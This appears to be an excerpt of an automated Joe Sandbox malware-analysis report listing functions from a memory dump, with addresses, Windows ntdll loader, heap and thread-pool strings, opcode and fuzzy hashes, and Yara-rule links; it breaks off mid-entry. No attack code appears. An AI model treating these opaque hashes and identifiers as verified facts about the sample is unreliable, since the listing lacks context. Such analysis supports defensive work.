                                                                                                                                    • API String ID: 0-1245972979
                                                                                                                                    • Opcode ID: 3c8e57c145ff1849f13a3891823b9cae461e41030f169a02d235a86d6a5e0989
                                                                                                                                    • Instruction ID: 07f265c53810513e4e3b694b74ac580ef6125ed54c84b33e5daad3f8c8d1ff76
                                                                                                                                    • Opcode Fuzzy Hash: 3c8e57c145ff1849f13a3891823b9cae461e41030f169a02d235a86d6a5e0989
                                                                                                                                    • Instruction Fuzzy Hash: D0613476604B129BDB22CF2CC885B3AF7E1BF80B50F158559EC569B291E770EC41CB91
                                                                                                                                    Function 017264AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01781028
                                                                                                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01780FE5
                                                                                                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017810AE
                                                                                                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0178106B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                    • API String ID: 0-1468400865
                                                                                                                                    • Opcode ID: 526fa3efb6e44a0765825f4fb5f37c448d6c7b5e90e1a8ed0673de6e97b40941
                                                                                                                                    • Instruction ID: bcbe1a320d2ebd5edc350c5e78a5339bc746e8df7e7a3d2501e45a3a26cd2abc
                                                                                                                                    • Opcode Fuzzy Hash: 526fa3efb6e44a0765825f4fb5f37c448d6c7b5e90e1a8ed0673de6e97b40941
                                                                                                                                    • Instruction Fuzzy Hash: 7A71E3B19043159FCB21EF19C888B9BBFA8EF94764F500469FD488B14AD334D589CBD2
                                                                                                                                    Function 0174245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • apphelp.dll, xrefs: 01742462
                                                                                                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0178A992
                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0178A9A2
                                                                                                                                    • LdrpDynamicShimModule, xrefs: 0178A998
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                    • API String ID: 0-176724104
                                                                                                                                    • Opcode ID: af68c29aedbf4c66b0b088be0dfeaef9ddafbabf06e4d26b17a7971867058cc1
                                                                                                                                    • Instruction ID: 5b1b71c2057f22ad524ea62e24e14d29c56bae0c563780150a9632fe815c2e8b
                                                                                                                                    • Opcode Fuzzy Hash: af68c29aedbf4c66b0b088be0dfeaef9ddafbabf06e4d26b17a7971867058cc1
                                                                                                                                    • Instruction Fuzzy Hash: 3F312A77640202ABDB31AF5DD885E6AFBB8FB84714F26005AFD01A7249D7B05A41CB40
                                                                                                                                    Function 017329A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0173327D
                                                                                                                                    • HEAP[%wZ]: , xrefs: 01733255
                                                                                                                                    • HEAP: , xrefs: 01733264
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                    • API String ID: 0-617086771
                                                                                                                                    • Opcode ID: 061dad94a5e6df17c526cb95543c0b923feeab6042300fe9f22b0fe3abeed9c8
                                                                                                                                    • Instruction ID: 6d9ef0ee985e5aafab084fec2d092322e071d686ca71c999b661f3be137bc984
                                                                                                                                    • Opcode Fuzzy Hash: 061dad94a5e6df17c526cb95543c0b923feeab6042300fe9f22b0fe3abeed9c8
                                                                                                                                    • Instruction Fuzzy Hash: 63929A71A046499FEB25CF68C444BAEFBF1FF88300F188099E959AB392D735A945CF50
                                                                                                                                    Function 01730770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                    • API String ID: 0-4253913091
                                                                                                                                    • Opcode ID: 62b4da434b645814e0e45186ba4ba17f8dca39d1775f0804cb837393180d3e20
                                                                                                                                    • Instruction ID: 29321822eee6bba1b9de94d38d6221337ff291e1e0c6ee4fc84571cbb21b5b03
                                                                                                                                    • Opcode Fuzzy Hash: 62b4da434b645814e0e45186ba4ba17f8dca39d1775f0804cb837393180d3e20
                                                                                                                                    • Instruction Fuzzy Hash: ABF1BE70A40606DFEB25DF68C894B6AF7F5FF84304F1481A8E5169B386D734EA81CB90
                                                                                                                                    Function 01746962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $@
                                                                                                                                    • API String ID: 0-1077428164
                                                                                                                                    • Opcode ID: dcb329dc1fb1b03771abfadf3c46bfbb24f0c9a5df5cad27fb6d66352f472771
                                                                                                                                    • Instruction ID: 7758d3631844b52ac7abe1bbad1c800a5075a946ea4543a1b62b50a0e955725a
                                                                                                                                    • Opcode Fuzzy Hash: dcb329dc1fb1b03771abfadf3c46bfbb24f0c9a5df5cad27fb6d66352f472771
                                                                                                                                    • Instruction Fuzzy Hash: FAC27F716083419FE72ACF28C881BABFBE5AF89754F04896DF999C7241D734D844CB62
                                                                                                                                    Function 0171A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                    • API String ID: 0-2779062949
                                                                                                                                    • Opcode ID: 18195bd714d1e777f06cde65608d3d29073deef7e9fec82329e3ee7ca454cbb2
                                                                                                                                    • Instruction ID: dc928f80127ced58e0ef87ff949d10475f54df84fb6e50b54ea6b6f822f14ad6
                                                                                                                                    • Opcode Fuzzy Hash: 18195bd714d1e777f06cde65608d3d29073deef7e9fec82329e3ee7ca454cbb2
                                                                                                                                    • Instruction Fuzzy Hash: 28A13E7191162A9BDF329F68CC88BE9F7B8EF48710F1041EAD909A7251D7359E84CF50
                                                                                                                                    Function 01740BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0178A121
                                                                                                                                    • LdrpCheckModule, xrefs: 0178A117
                                                                                                                                    • Failed to allocated memory for shimmed module list, xrefs: 0178A10F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                    • API String ID: 0-161242083
                                                                                                                                    • Opcode ID: 6452f3f4cf98fc84dd1cc9ff705893313fc26eea79fcf157210cd7d3cf937e31
                                                                                                                                    • Instruction ID: 6b33cafa93b402765dddbb133e043f63865cef688884d5d85d4d4edb2d82b718
                                                                                                                                    • Opcode Fuzzy Hash: 6452f3f4cf98fc84dd1cc9ff705893313fc26eea79fcf157210cd7d3cf937e31
                                                                                                                                    • Instruction Fuzzy Hash: EB71DE71A00206DFDB25EF68C984AFEF7F8FB84204F14406DE942EB255E774AA42CB54
                                                                                                                                    Function 01730A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                    • API String ID: 0-1334570610
                                                                                                                                    • Opcode ID: be414006958ce051c306843d2d8c435ac6df46970c6e9b48cebc46c540d9592f
                                                                                                                                    • Instruction ID: 2d8cb52d0606861c33f70375b2176dade747ac617b6950b02afe8fd05d503d43
                                                                                                                                    • Opcode Fuzzy Hash: be414006958ce051c306843d2d8c435ac6df46970c6e9b48cebc46c540d9592f
                                                                                                                                    • Instruction Fuzzy Hash: E761CE70600301DFDB29DF28C844B6AFBE1FF85308F148599E4498F296D770E981CB91
                                                                                                                                    Function 0175C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 017982DE
                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 017982E8
                                                                                                                                    • Failed to reallocate the system dirs string !, xrefs: 017982D7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                    • API String ID: 0-1783798831
                                                                                                                                    • Opcode ID: 269372401ed8d4db53268a4c3476bd900d2167a89f271692cc105e4977fbde1c
                                                                                                                                    • Instruction ID: 69bde59306c79a7395239508ad7fd6823f835fa1ea3607fcc5cc1d038a67e0e1
                                                                                                                                    • Opcode Fuzzy Hash: 269372401ed8d4db53268a4c3476bd900d2167a89f271692cc105e4977fbde1c
                                                                                                                                    • Instruction Fuzzy Hash: 4E41F372544305ABD722EB68DC48B5BF7ECEF48A50F10492AF955D3299E7B0D900CB91
                                                                                                                                    Function 017DC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • @, xrefs: 017DC1F1
                                                                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017DC1C5
                                                                                                                                    • PreferredUILanguages, xrefs: 017DC212
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                    • API String ID: 0-2968386058
                                                                                                                                    • Opcode ID: 4b814b5e3e37f7bcf8e4c098e9275b7e9808212f70324ff0982c34a2e18d5c85
                                                                                                                                    • Instruction ID: 2744613aea18f2d4fcb337b72f6fa15084ce138cda665eac1e1fdaa9dd50c5f5
                                                                                                                                    • Opcode Fuzzy Hash: 4b814b5e3e37f7bcf8e4c098e9275b7e9808212f70324ff0982c34a2e18d5c85
                                                                                                                                    • Instruction Fuzzy Hash: 23416371E0420DEBDB12DAD8C895FEEFBBDAB18700F14416EEA09B7244D774AA44CB50
                                                                                                                                    Function 017B4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                    • API String ID: 0-1373925480
                                                                                                                                    • Opcode ID: 515579f8ab8152fa82f5f1732b57a79be4200f95fc45834dee2c64bdd5f09a34
                                                                                                                                    • Instruction ID: f8fa6b3dccd98f52f59df9a17c2f3ca44820691accc96306994187fa7b2ed058
                                                                                                                                    • Opcode Fuzzy Hash: 515579f8ab8152fa82f5f1732b57a79be4200f95fc45834dee2c64bdd5f09a34
                                                                                                                                    • Instruction Fuzzy Hash: 2A41F431A04658CBEB26DB99C888BEDFBB8FF95340F140469D903EB796D7349941CB50
                                                                                                                                    Function 017A4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017A4888
                                                                                                                                    • LdrpCheckRedirection, xrefs: 017A488F
                                                                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 017A4899
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                    • API String ID: 0-3154609507
                                                                                                                                    • Opcode ID: b46b5da07d54777afab50feeec9354a20c09631ec7043561f3f0a17507323c3e
                                                                                                                                    • Instruction ID: 09272011ce66559ef06b665e42738e439b865f3bc093614727b83b3845bac2c1
                                                                                                                                    • Opcode Fuzzy Hash: b46b5da07d54777afab50feeec9354a20c09631ec7043561f3f0a17507323c3e
                                                                                                                                    • Instruction Fuzzy Hash: 5241D332A442919FCB21CE1CE840A26FBE4EFC9A50F49076DED4AD7215D7B2D800CB81
                                                                                                                                    Function 01730BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                    • API String ID: 0-2558761708
                                                                                                                                    • Opcode ID: 87542aeba5acd1e7d055acadcfbb066c3239633e015d3f1c0fd13a17bf9898b3
                                                                                                                                    • Instruction ID: 675aeddb6bd654cf8152107888ce909b9f089d7b66c6cefb89aa40b4b5abe9e9
                                                                                                                                    • Opcode Fuzzy Hash: 87542aeba5acd1e7d055acadcfbb066c3239633e015d3f1c0fd13a17bf9898b3
                                                                                                                                    • Instruction Fuzzy Hash: 3911AC32395142DFDB29EA1CC859B6AF3A5EF80616F1881A9F40ACB65ADB30D841CB50
                                                                                                                                    Function 017A20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • LdrpInitializationFailure, xrefs: 017A20FA
                                                                                                                                    • Process initialization failed with status 0x%08lx, xrefs: 017A20F3
                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 017A2104
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                    • API String ID: 0-2986994758
                                                                                                                                    • Opcode ID: 36f83d614d1e48cce970d1b8153e00c22428edc27ec49dbff6a4bc9c7bbd808a
                                                                                                                                    • Instruction ID: aba1b627513cf19e9f75397be503d447c436f93d16b0204a25c0910851822c3b
                                                                                                                                    • Opcode Fuzzy Hash: 36f83d614d1e48cce970d1b8153e00c22428edc27ec49dbff6a4bc9c7bbd808a
                                                                                                                                    • Instruction Fuzzy Hash: 3FF0FC76780309BBE725D64CDC5AF99B7ACFB81B54F90046DFB00772C6D5B0A640CA51
                                                                                                                                    Function 017303E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                    • String ID: #%u
                                                                                                                                    • API String ID: 48624451-232158463
                                                                                                                                    • Opcode ID: 90bbda21c5f6cc3c504df7270ca4d87435bcc0373c26f78fab9371f111f3799a
                                                                                                                                    • Instruction ID: c6dae95a90671388209164b7f2a108ee5cbe164f6dc5b3dfb6bb940baae24d97
                                                                                                                                    • Opcode Fuzzy Hash: 90bbda21c5f6cc3c504df7270ca4d87435bcc0373c26f78fab9371f111f3799a
                                                                                                                                    • Instruction Fuzzy Hash: 8D715971A0014A9FDB11DFA8C994FAEFBF8BF48704F144065E905E7256EA78EE41CB60
                                                                                                                                    Function 0172A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • LdrResSearchResource Enter, xrefs: 0172AA13
                                                                                                                                    • LdrResSearchResource Exit, xrefs: 0172AA25
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                    • API String ID: 0-4066393604
                                                                                                                                    • Opcode ID: f0851d7fa35336b496b1da40b739ea430652871fa4fece9d03b7337824f811df
                                                                                                                                    • Instruction ID: 5c86fc2b37721d00ee9ebf37d6f4eb1811ad5a57431af5b2108e2b5e93df3245
                                                                                                                                    • Opcode Fuzzy Hash: f0851d7fa35336b496b1da40b739ea430652871fa4fece9d03b7337824f811df
                                                                                                                                    • Instruction Fuzzy Hash: 0BE17E71E40269AFEB22DE9CC984BAEFBBAFF14710F10446AE901E7651D734D942CB50
                                                                                                                                    Function 017EA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: `$`
                                                                                                                                    • API String ID: 0-197956300
                                                                                                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                    • Instruction ID: bed465f9165ee9c69c1ca7c9f8acdab98f908a023f900b2423c7336cc770c5a9
                                                                                                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                    • Instruction Fuzzy Hash: FAC1C1312043429BEB25CF28C849B6BFBE5AFD8318F184A2DF696CB291D774D505CB52
                                                                                                                                    Function 0179E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID: Legacy$UEFI
                                                                                                                                    • API String ID: 2994545307-634100481
                                                                                                                                    • Opcode ID: d83b15bb7f475951f825f10e5ba0a230fe13e8f53909ea05dff4fb98af790a40
                                                                                                                                    • Instruction ID: 065c3699c00c5f04cb40dc7058710cceebe46d6c75e7407d6f24422f1acb81e7
                                                                                                                                    • Opcode Fuzzy Hash: d83b15bb7f475951f825f10e5ba0a230fe13e8f53909ea05dff4fb98af790a40
                                                                                                                                    • Instruction Fuzzy Hash: 5C615871E407199FDB24DFA8D844BAEFBB9FB48700F14406DE649EB291DB31A944CB50
                                                                                                                                    Function 017C43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @$MUI
                                                                                                                                    • API String ID: 0-17815947
                                                                                                                                    • Opcode ID: fe58a87666f7d0f49e15d3bfe93412df10a64a712559aedc44cbf0d7de2e8249
                                                                                                                                    • Instruction ID: f8de8f86df775d5018cd26ca86befbc7f8d8503946e7820aa37758b90c3312ba
                                                                                                                                    • Opcode Fuzzy Hash: fe58a87666f7d0f49e15d3bfe93412df10a64a712559aedc44cbf0d7de2e8249
                                                                                                                                    • Instruction Fuzzy Hash: 75511871E0021DAEDB11DFA9CC94AEEFBBCEB54B54F100529EA11B7290D7309A05CB60
                                                                                                                                    Function 017204E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0172063D
                                                                                                                                    • kLsE, xrefs: 01720540
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                    • API String ID: 0-2547482624
                                                                                                                                    • Opcode ID: 6436ab65d4ed9c6f0ddd396acf2115b528fe362207e74a95b852018dc95dfaa4
                                                                                                                                    • Instruction ID: e28f8e93adf7a3a0787b8c05ee6ac45ee5116a9e94557eb56b6f5c8948f07373
                                                                                                                                    • Opcode Fuzzy Hash: 6436ab65d4ed9c6f0ddd396acf2115b528fe362207e74a95b852018dc95dfaa4
                                                                                                                                    • Instruction Fuzzy Hash: 53519C715047528FD734DF69C544AA7FBE4AF84304F20483EFAAA87241E7749546CFA2
                                                                                                                                    Function 0172A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 0172A309
                                                                                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 0172A2FB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                    • API String ID: 0-2876891731
                                                                                                                                    • Opcode ID: 7f86f1ca255b65a9fa8c5f8a96d389c9e2a2c75443de88b8eb20294f0901387d
                                                                                                                                    • Instruction ID: a97f029b315711bd60d75fbc3a913aacd86ffe127a9ecfaecc8e1e0fdcdc8ea5
                                                                                                                                    • Opcode Fuzzy Hash: 7f86f1ca255b65a9fa8c5f8a96d389c9e2a2c75443de88b8eb20294f0901387d
                                                                                                                                    • Instruction Fuzzy Hash: 2C41CC31A01669DBDB21DF69C844B6EFBB4FF84700F2440A9E900DB693E2B5D941CB90
                                                                                                                                    Function 0175A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID: Cleanup Group$Threadpool!
                                                                                                                                    • API String ID: 2994545307-4008356553
                                                                                                                                    • Opcode ID: 1c30285a0538e7fc8715f07f6d864b96811073b7a29afebc4c834441be576b85
                                                                                                                                    • Instruction ID: bee52fb0c18b88431526460da0bd155e611e97da8c9603a898ac1adce85c60f2
                                                                                                                                    • Opcode Fuzzy Hash: 1c30285a0538e7fc8715f07f6d864b96811073b7a29afebc4c834441be576b85
                                                                                                                                    • Instruction Fuzzy Hash: 2001F4B2640740AFD351DF24CD49F16B7E8EB94715F058A3DAA49C7190E3B4D904CB56
                                                                                                                                    Function 0172C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
